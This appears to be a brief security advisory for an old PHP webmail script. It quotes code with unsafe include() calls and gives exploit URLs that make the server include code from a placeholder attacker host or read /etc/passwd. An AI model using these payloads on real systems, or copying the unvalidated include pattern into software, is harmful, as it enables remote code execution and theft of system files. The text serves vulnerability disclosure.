Version : 0.2;0.3;0.4 Website : http://www.isoca.com/ Problems :Include file (local, remote) Version: 0.2;0.3 File: --------------------------------- email.php3 (version 0.2) ; email.php (version 0.3) --------------------------------- PHP Code: --------------------------------- [...] require('emailreader.ini'); if ($login > "") { parse_str($param); include($cer_skin); include('email.inc'); $mbox = openimap($server, $username, $password); $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN")); [...] --------------------------------- Exploit : --------------------------------- http://[target]/email.php?login=attacker&cer_skin=http:// [attacker]/code.php --> include http://[attacker]/code.php on remote server --- include local file --> http://[target]/email.php?login=attacker&cer_skin=/etc/passwd --------------------------------- Versions: 0.4 File: --------------------------------- webmail/lib/emailreader_execute_on_each_page.inc.php --------------------------------- PHP Code: --------------------------------- [...] $param = imap_base64($login); parse_str($param); @include($emailreader_ini); @include('lib/'.$server_type.'.inc.php'); @include('skin/emailreaderskin_'.$lang.'.php'); [...] --------------------------------- Exploit : --------------------------------- http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php? emailreader_ini=http://[attacker]/code.php --> include http://[attacker]/code.php on remote server --- include local file --> http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php? emailreader_ini=/etc/passwd --------------------------------- -- (if registers_global=ON) -- -- magas@mail.lt
